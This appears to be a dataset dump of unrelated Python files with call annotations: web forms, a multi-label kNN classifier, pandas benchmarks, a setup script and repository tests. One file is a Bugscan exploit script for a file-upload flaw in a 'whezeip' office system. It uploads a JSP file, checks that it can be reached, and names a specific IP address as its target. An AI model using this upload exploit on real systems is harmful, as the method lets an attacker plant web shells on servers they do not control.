submit = SubmitField("Share my Idea") | [((27, 13, 27, 49), 'wtforms.SubmitField', 'SubmitField', ({(27, 25, 27, 48): '"""Register your Company"""'}, {}), "('Register your Company')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((44, 13, 44, 36), 'wtforms.SubmitField', 'SubmitField', ({(44, 25, 44, 35): '"""Register"""'}, {}), "('Register')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((49, 18, 49, 45), 'wtforms.BooleanField', 'BooleanField', ({(49, 31, 49, 44): '"""Remember Me"""'}, {}), "('Remember Me')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((50, 13, 50, 35), 'wtforms.SubmitField', 'SubmitField', ({(50, 25, 50, 34): '"""Sign In"""'}, {}), "('Sign In')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((53, 12, 53, 32), 'wtforms.HiddenField', 'HiddenField', ({(53, 24, 53, 31): '"""Email"""'}, {}), "('Email')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((65, 13, 65, 44), 'wtforms.SubmitField', 'SubmitField', ({(65, 25, 65, 43): '"""Confirm my Email"""'}, {}), "('Confirm my Email')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((69, 13, 69, 34), 'wtforms.SubmitField', 'SubmitField', ({(69, 25, 69, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((73, 13, 73, 34), 'wtforms.SubmitField', 'SubmitField', ({(73, 25, 73, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((78, 13, 78, 34), 'wtforms.SubmitField', 'SubmitField', ({(78, 25, 78, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((82, 13, 82, 34), 'wtforms.SubmitField', 'SubmitField', ({(82, 25, 82, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((93, 13, 93, 34), 'wtforms.SubmitField', 'SubmitField', ({(93, 25, 93, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((104, 13, 104, 41), 'wtforms.SubmitField', 'SubmitField', ({(104, 25, 104, 40): '"""Upload Avatar"""'}, {}), "('Upload Avatar')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((108, 13, 108, 47), 'wtforms.SubmitField', 'SubmitField', ({(108, 25, 108, 46): '"""Delete Registration"""'}, {}), "('Delete Registration')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((118, 13, 118, 39), 'wtforms.SubmitField', 'SubmitField', ({(118, 25, 118, 38): '"""Upload Logo"""'}, {}), "('Upload Logo')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((122, 13, 122, 34), 'wtforms.SubmitField', 'SubmitField', ({(122, 25, 122, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((133, 13, 133, 34), 'wtforms.SubmitField', 'SubmitField', ({(133, 25, 133, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((136, 21, 136, 51), 'wtforms.BooleanField', 'BooleanField', ({(136, 34, 136, 50): '"""Update Company"""'}, {}), "('Update Company')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((137, 23, 137, 55), 'wtforms.BooleanField', 'BooleanField', ({(137, 36, 137, 54): '"""Update Privilegs"""'}, {}), "('Update Privilegs')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((138, 23, 138, 55), 'wtforms.BooleanField', 'BooleanField', ({(138, 36, 138, 54): '"""Update Colleague"""'}, {}), "('Update Colleague')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((139, 17, 139, 48), 'wtforms.BooleanField', 'BooleanField', ({(139, 30, 139, 47): '"""Update Idea Box"""'}, {}), "('Update Idea Box')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((141, 13, 141, 44), 'wtforms.SubmitField', 'SubmitField', ({(141, 25, 141, 43): '"""Update Privilegs"""'}, {}), "('Update Privilegs')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((146, 15, 146, 57), 'wtforms.fields.html5.DateField', 'DateField', (), '', False, 'from wtforms.fields.html5 import DateField, IntegerField\n'), ((147, 13, 147, 38), 'wtforms.SubmitField', 'SubmitField', ({(147, 25, 147, 37): '"""Create Box"""'}, {}), "('Create Box')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((151, 11, 159, 5), 'wtforms.RadioField', 'RadioField', (), '', False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((160, 13, 160, 41), 'wtforms.SubmitField', 'SubmitField', ({(160, 25, 160, 40): '"""Share my Idea"""'}, {}), "('Share my Idea')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((9, 61, 9, 75), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((10, 60, 10, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((11, 62, 11, 76), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((12, 60, 12, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((13, 58, 13, 72), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((14, 47, 14, 61), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((14, 63, 14, 70), 'wtforms.validators.Email', 'Email', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((15, 72, 15, 86), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((18, 22, 18, 36), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((19, 8, 19, 35), 'wtforms.validators.EqualTo', 'EqualTo', ({(19, 16, 19, 34): '"""founder_password"""'}, {}), "('founder_password')", False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((21, 89, 21, 103), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((24, 22, 24, 36), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((25, 8, 25, 35), 'wtforms.validators.EqualTo', 'EqualTo', ({(25, 16, 25, 34): '"""joining_password"""'}, {}), "('joining_password')", False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((30, 61, 30, 75), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((31, 89, 31, 103), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((32, 60, 32, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((33, 47, 33, 61), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((33, 63, 33, 70), 'wtforms.validators.Email', 'Email', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((34, 62, 34, 76), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((35, 60, 35, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((36, 58, 36, 72), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((37, 60, 37, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((40, 22, 40, 36), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((41, 8, 41, 27), 'wtforms.validators.EqualTo', 'EqualTo', ({(41, 16, 41, 26): '"""password"""'}, {}), "('password')", False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((47, 73, 47, 87), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((48, 55, 48, 69), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((57, 12, 57, 26), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((58, 12, 62, 13), 'wtforms.validators.NumberRange', 'NumberRange', (), '', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((68, 57, 68, 71), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((72, 55, 72, 69), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((76, 47, 76, 61), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((76, 63, 76, 70), 'wtforms.validators.Email', 'Email', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((77, 55, 77, 69), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((81, 58, 81, 72), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((85, 68, 85, 82), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((86, 68, 86, 82), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((89, 22, 89, 36), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((90, 8, 90, 38), 'wtforms.validators.EqualTo', 'EqualTo', ({(90, 16, 90, 37): '"""repeat_new_password"""'}, {}), "('repeat_new_password')", False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((100, 12, 100, 26), 'flask_wtf.file.FileRequired', 'FileRequired', ({}, {}), '()', False, 'from flask_wtf.file import FileField, FileAllowed, FileRequired\n'), ((101, 12, 101, 84), 'flask_wtf.file.FileAllowed', 'FileAllowed', ({(101, 24, 101, 38): 'allowed_format', (101, 40, 101, 83): 'f"""Wrong format! Allowed: {allowed_format}."""'}, {}), "(allowed_format, f'Wrong format! Allowed: {allowed_format}.')", False, 'from flask_wtf.file import FileField, FileAllowed, FileRequired\n'), ((107, 60, 107, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((114, 12, 114, 26), 'flask_wtf.file.FileRequired', 'FileRequired', ({}, {}), '()', False, 'from flask_wtf.file import FileField, FileAllowed, FileRequired\n'), ((115, 12, 115, 84), 'flask_wtf.file.FileAllowed', 'FileAllowed', ({(115, 24, 115, 38): 'allowed_format', (115, 40, 115, 83): 'f"""Wrong format! Allowed: {allowed_format}."""'}, {}), "(allowed_format, f'Wrong format! Allowed: {allowed_format}.')", False, 'from flask_wtf.file import FileField, FileAllowed, FileRequired\n'), ((121, 61, 121, 75), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((125, 71, 125, 85), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((126, 71, 126, 85), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((129, 22, 129, 36), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((130, 8, 130, 38), 'wtforms.validators.EqualTo', 'EqualTo', ({(130, 16, 130, 37): '"""repeat_new_password"""'}, {}), "('repeat_new_password')", False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((140, 60, 140, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((144, 46, 144, 60), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((145, 61, 145, 75), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((150, 49, 150, 63), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n')] |
fullmooncj/textmining_edu | 5.analysis/scikit-multilearn-master/skmultilearn/adapt/brknn.py | b1402fd96fbde945f48c52d71ba4dfe51fd96602 | from builtins import range
from ..base import MLClassifierBase
from ..utils import get_matrix_in_format
from sklearn.neighbors import NearestNeighbors
import scipy.sparse as sparse
import numpy as np
class BinaryRelevanceKNN(MLClassifierBase):
"""Binary Relevance adapted kNN Multi-Label Classifier."""
def __init__(self, k = 10):
super(BinaryRelevanceKNN, self).__init__()
self.k = k # Number of neighbours
self.copyable_attrs = ['k']
def fit(self, X, y):
"""Fit classifier with training data
Internally this method uses a sparse CSC representation for y
(:py:class:`scipy.sparse.csc_matrix`).
:param X: input features
:type X: dense or sparse matrix (n_samples, n_features)
:param y: binary indicator matrix with label assignments
:type y: dense or sparse matrix of {0, 1} (n_samples, n_labels)
:returns: Fitted instance of self
"""
self.train_labelspace = get_matrix_in_format(y, 'csc')
self.num_instances = self.train_labelspace.shape[0]
self.num_labels = self.train_labelspace.shape[1]
self.knn = NearestNeighbors(self.k).fit(X)
return self
def compute_confidences(self):
# % of neighbours that have a given label assigned
# sum over each label columns after subsetting for neighbours
# and normalize
self.confidences = np.vstack([self.train_labelspace[n,:].tocsc().sum(axis=0) / float(self.num_labels) for n in self.neighbors])
return self.confidences
def predict(self, X):
"""Predict labels for X
:param X: input features
:type X: dense or sparse matrix (n_samples, n_features)
:returns: binary indicator matrix with label assignments
:rtype: sparse matrix of int (n_samples, n_labels)
"""
self.neighbors = self.knn.kneighbors(X, self.k, return_distance=False)
self.compute_confidences()
return self.predict_variant(X)
class BRkNNaClassifier(BinaryRelevanceKNN):
"""Binary Relevance multi-label classifier based on k Nearest Neighbours method.
This version of the classifier assigns the labels that are assigned to at least half of the neighbors.
:param int k: number of neighbors
"""
def predict_variant(self, X):
# TODO: find out if moving the sparsity to compute confidences boots speed
return sparse.csr_matrix(np.rint(self.confidences), dtype='i8')
class BRkNNbClassifier(BinaryRelevanceKNN):
"""Binary Relevance multi-label classifier based on k Nearest Neighbours method.
This version of the classifier assigns the most popular m labels of the neighbors, where m is the
average number of labels assigned to the object's neighbors.
:param int k: number of neighbors
"""
def predict_variant(self, X):
self.avg_labels = [int(np.average(self.train_labelspace[n,:].sum(axis=1)).round()) for n in self.neighbors]
prediction = sparse.lil_matrix((X.shape[0], self.num_labels), dtype='i8')
top_labels = np.argpartition(self.confidences, kth=min(self.avg_labels, len(self.confidences[0])), axis=1).tolist()
for i in range(X.shape[0]):
for j in top_labels[i][-self.avg_labels[i]:]:
prediction[i,j] += 1
return prediction | [((83, 21, 83, 81), 'scipy.sparse.lil_matrix', 'sparse.lil_matrix', (), '', True, 'import scipy.sparse as sparse\n'), ((86, 17, 86, 34), 'builtins.range', 'range', ({(86, 23, 86, 33): 'X.shape[0]'}, {}), '(X.shape[0])', False, 'from builtins import range\n'), ((68, 33, 68, 58), 'numpy.rint', 'np.rint', ({(68, 41, 68, 57): 'self.confidences'}, {}), '(self.confidences)', True, 'import numpy as np\n'), ((32, 19, 32, 43), 'sklearn.neighbors.NearestNeighbors', 'NearestNeighbors', ({(32, 36, 32, 42): 'self.k'}, {}), '(self.k)', False, 'from sklearn.neighbors import NearestNeighbors\n')] |
eric-gro/api-client | groclient/constants.py | 0ca73422c25b5065907d068a44b72bdc43fea79f | """Constants about the Gro ontology that can be imported and re-used anywhere."""
REGION_LEVELS = {
'world': 1,
'continent': 2,
'country': 3,
'province': 4, # Equivalent to state in the United States
'district': 5, # Equivalent to county in the United States
'city': 6,
'market': 7,
'other': 8,
'coordinate': 9
}
ENTITY_TYPES_PLURAL = ['metrics', 'items', 'regions', 'frequencies', 'sources', 'units']
DATA_SERIES_UNIQUE_TYPES_ID = [
'metric_id',
'item_id',
'region_id',
'partner_region_id',
'frequency_id',
'source_id'
]
ENTITY_KEY_TO_TYPE = {
'metric_id': 'metrics',
'item_id': 'items',
'region_id': 'regions',
'partner_region_id': 'regions',
'source_id': 'sources',
'frequency_id': 'frequencies',
'unit_id': 'units'
}
DATA_POINTS_UNIQUE_COLS = DATA_SERIES_UNIQUE_TYPES_ID + [
'reporting_date',
'start_date',
'end_date'
]
| [] |
CitizenB/pandas | asv_bench/benchmarks/tslibs/period.py | ee1efb6d923a2c3e5a912efe20a336179614993d | """
Period benchmarks that rely only on tslibs. See benchmarks.period for
Period benchmarks that rely on other parts fo pandas.
"""
from pandas import Period
from pandas.tseries.frequencies import to_offset
class PeriodProperties:
params = (
["M", "min"],
[
"year",
"month",
"day",
"hour",
"minute",
"second",
"is_leap_year",
"quarter",
"qyear",
"week",
"daysinmonth",
"dayofweek",
"dayofyear",
"start_time",
"end_time",
],
)
param_names = ["freq", "attr"]
def setup(self, freq, attr):
self.per = Period("2012-06-01", freq=freq)
def time_property(self, freq, attr):
getattr(self.per, attr)
class PeriodUnaryMethods:
params = ["M", "min"]
param_names = ["freq"]
def setup(self, freq):
self.per = Period("2012-06-01", freq=freq)
def time_to_timestamp(self, freq):
self.per.to_timestamp()
def time_now(self, freq):
self.per.now(freq)
def time_asfreq(self, freq):
self.per.asfreq("A")
class PeriodConstructor:
params = [["D"], [True, False]]
param_names = ["freq", "is_offset"]
def setup(self, freq, is_offset):
if is_offset:
self.freq = to_offset(freq)
else:
self.freq = freq
def time_period_constructor(self, freq, is_offset):
Period("2012-06-01", freq=freq)
| [((35, 19, 35, 50), 'pandas.Period', 'Period', (), '', False, 'from pandas import Period\n'), ((47, 19, 47, 50), 'pandas.Period', 'Period', (), '', False, 'from pandas import Period\n'), ((70, 8, 70, 39), 'pandas.Period', 'Period', (), '', False, 'from pandas import Period\n'), ((65, 24, 65, 39), 'pandas.tseries.frequencies.to_offset', 'to_offset', ({(65, 34, 65, 38): 'freq'}, {}), '(freq)', False, 'from pandas.tseries.frequencies import to_offset\n')] |
csadsl/poc_exp | Bugscan_exploits-master/exp_list/exp-1788.py | e3146262e7403f19f49ee2db56338fa3f8e119c9 | #/usr/bin/python
#-*- coding: utf-8 -*-
#Refer http://www.wooyun.org/bugs/wooyun-2015-0137140
#__Author__ = 上善若水
#_PlugName_ = whezeip Plugin
#_FileName_ = whezeip.py
def assign(service, arg):
if service == "whezeip":
return True, arg
def audit(arg):
raw = '''
POST /defaultroot/customize/formClassUpload.jsp?flag=1&returnField=null HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 127.0.0.1/defaultroot/customize/formClassUpload.jsp
Cookie: LocLan=zh_cn; JSESSIONID=zXP1WqCc0h80FSvJNVdnj1fGpTJfh2GphR5GYJnJGLLKKKtJdGJN!-668245681
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------11327923318636
Content-Length: 328
-----------------------------11327923318636
Content-Disposition: form-data; name="photo"; filename="testvul.jsp"
Content-Type: application/octet-stream
testvul_uploadfile_test
-----------------------------11327923318636
Content-Disposition: form-data; name="submit"
ä¸ä¼
-----------------------------11327923318636--
'''
url = arg + 'defaultroot/customize/formClassUpload.jsp?flag=1&returnField=null'
# proxy=('127.0.0.1',1234)
# code, head,res, errcode, _ = curl.curl2(url,proxy=proxy,raw=raw)
code1, head1, res1, errcode1, _url1 = curl.curl2(url,raw=raw)
shell_path = 'defaultroot/devform/customize/' + 'testvul.jsp'
code2, head2, res2, errcode2, _url2 = curl.curl2(arg+shell_path)
if code2 == 200 and 'testvul_uploadfile_test' in res2:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('whezeip', 'http://218.104.147.71:7001/')[1]) | [] |
thecodingsim/learn-python | 3-working-with-lists/zip_tuples.py | bf8e98f40e73ebf7dcf5641312c2c0296d886952 | # Use zip() to create a new variable called names_and_dogs_names that combines owners and dogs_names lists into a zip object.
# Then, create a new variable named list_of_names_and_dogs_names by calling the list() function on names_and_dogs_names.
# Print list_of_names_and_dogs_names.
owners = ["Jenny", "Alexus", "Sam", "Grace"]
dogs_names = ["Elphonse", "Dr. Doggy DDS", "Carter", "Ralph"]
names_and_dogs_names = zip(owners, dogs_names)
list_of_names_and_dogs_names = list(names_and_dogs_names)
print(list_of_names_and_dogs_names) | [] |
abhiomkar/couchdbkit | setup.py | 035062b504b57c1cc6e576be47fb05423fb1ddb3 | # -*- coding: utf-8 -
#
# This file is part of couchdbkit released under the MIT license.
# See the NOTICE for more information.
import os
import sys
if not hasattr(sys, 'version_info') or sys.version_info < (2, 5, 0, 'final'):
raise SystemExit("couchdbkit requires Python 2.5 or later.")
from setuptools import setup, find_packages
from couchdbkit import __version__
setup(
name = 'couchdbkit',
version = __version__,
description = 'Python couchdb kit',
long_description = file(
os.path.join(
os.path.dirname(__file__),
'README.rst'
)
).read(),
author = 'Benoit Chesneau',
author_email = '[email protected]',
license = 'Apache License 2',
url = 'http://couchdbkit.org',
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Database',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries :: Python Modules',
],
packages = find_packages(exclude=['tests']),
zip_safe = False,
install_requires = [
'restkit>=3.2',
],
entry_points="""
[couchdbkit.consumers]
sync=couchdbkit.consumer.sync:SyncConsumer
eventlet=couchdbkit.consumer.ceventlet:EventletConsumer
gevent=couchdbkit.consumer.cgevent:GeventConsumer
""",
test_suite='noses',
)
| [((42, 15, 42, 47), 'setuptools.find_packages', 'find_packages', (), '', False, 'from setuptools import setup, find_packages\n'), ((22, 12, 22, 37), 'os.path.dirname', 'os.path.dirname', ({(22, 28, 22, 36): '__file__'}, {}), '(__file__)', False, 'import os\n')] |
othercodes/sample-todo-list-hexagonal-achitecture | tests/integration/test_infrastructure_persistence.py | a958c6906d8e777e837c8348c754b637b89a7031 | from typing import Optional
from complexheart.domain.criteria import Criteria
from sqlalchemy import create_engine
from sqlalchemy.engine import Engine
from sqlalchemy.orm import sessionmaker
from to_do_list.tasks.domain.models import Task
from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller
db_engine: Optional[Engine] = None
def setup_function():
global db_engine
db_engine = create_engine('sqlite:///:memory:')
DBInstaller(db_engine).install()
def test_repository_should_save_new_task_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
task = repository.save(task_factory({}))
assert session.query(Task).get(task.id)
def test_repository_should_find_task_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
task = repository.save(task_factory({}))
assert repository.find(task.id)
def test_repository_should_match_task_by_criteria_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
for i in range(11):
repository.save(task_factory({'description': 'My task {i}'.format(i=i)}))
tasks = repository.match(
Criteria() \
.filter('description', 'like', '%task 1%') \
.order_by(['id'])
)
for task in tasks:
assert isinstance(task, Task)
assert len(tasks) == 2
def test_repository_should_get_all_tasks_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
for i in range(10):
repository.save(task_factory({'description': 'My task {i}'.format(i=i)}))
tasks = repository.all()
for task in tasks:
assert isinstance(task, Task)
assert len(tasks) == 10
| [((16, 16, 16, 51), 'sqlalchemy.create_engine', 'create_engine', ({(16, 30, 16, 50): '"""sqlite:///:memory:"""'}, {}), "('sqlite:///:memory:')", False, 'from sqlalchemy import create_engine\n'), ((23, 17, 23, 50), 'to_do_list.tasks.infrastructure.persistence.relational.RelationalTaskRepository', 'RelationalTaskRepository', ({(23, 42, 23, 49): 'session'}, {}), '(session)', False, 'from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller\n'), ((32, 17, 32, 50), 'to_do_list.tasks.infrastructure.persistence.relational.RelationalTaskRepository', 'RelationalTaskRepository', ({(32, 42, 32, 49): 'session'}, {}), '(session)', False, 'from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller\n'), ((41, 17, 41, 50), 'to_do_list.tasks.infrastructure.persistence.relational.RelationalTaskRepository', 'RelationalTaskRepository', ({(41, 42, 41, 49): 'session'}, {}), '(session)', False, 'from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller\n'), ((60, 17, 60, 50), 'to_do_list.tasks.infrastructure.persistence.relational.RelationalTaskRepository', 'RelationalTaskRepository', ({(60, 42, 60, 49): 'session'}, {}), '(session)', False, 'from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller\n'), ((21, 14, 21, 42), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', (), '', False, 'from sqlalchemy.orm import sessionmaker\n'), ((30, 14, 30, 42), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', (), '', False, 'from sqlalchemy.orm import sessionmaker\n'), ((39, 14, 39, 42), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', (), '', False, 'from sqlalchemy.orm import sessionmaker\n'), ((58, 14, 58, 42), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', (), '', False, 'from sqlalchemy.orm import sessionmaker\n'), ((17, 4, 17, 26), 'to_do_list.tasks.infrastructure.persistence.relational.DBInstaller', 'DBInstaller', ({(17, 16, 17, 25): 'db_engine'}, {}), '(db_engine)', False, 'from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller\n'), ((47, 8, 47, 18), 'complexheart.domain.criteria.Criteria', 'Criteria', ({}, {}), '()', False, 'from complexheart.domain.criteria import Criteria\n')] |
minervaproject/wagtail-jinja2-extensions | wagtail_jinja2/extensions.py | 708f2f873273312ead80d67c3eff0555f152d072 | from jinja2.ext import Extension
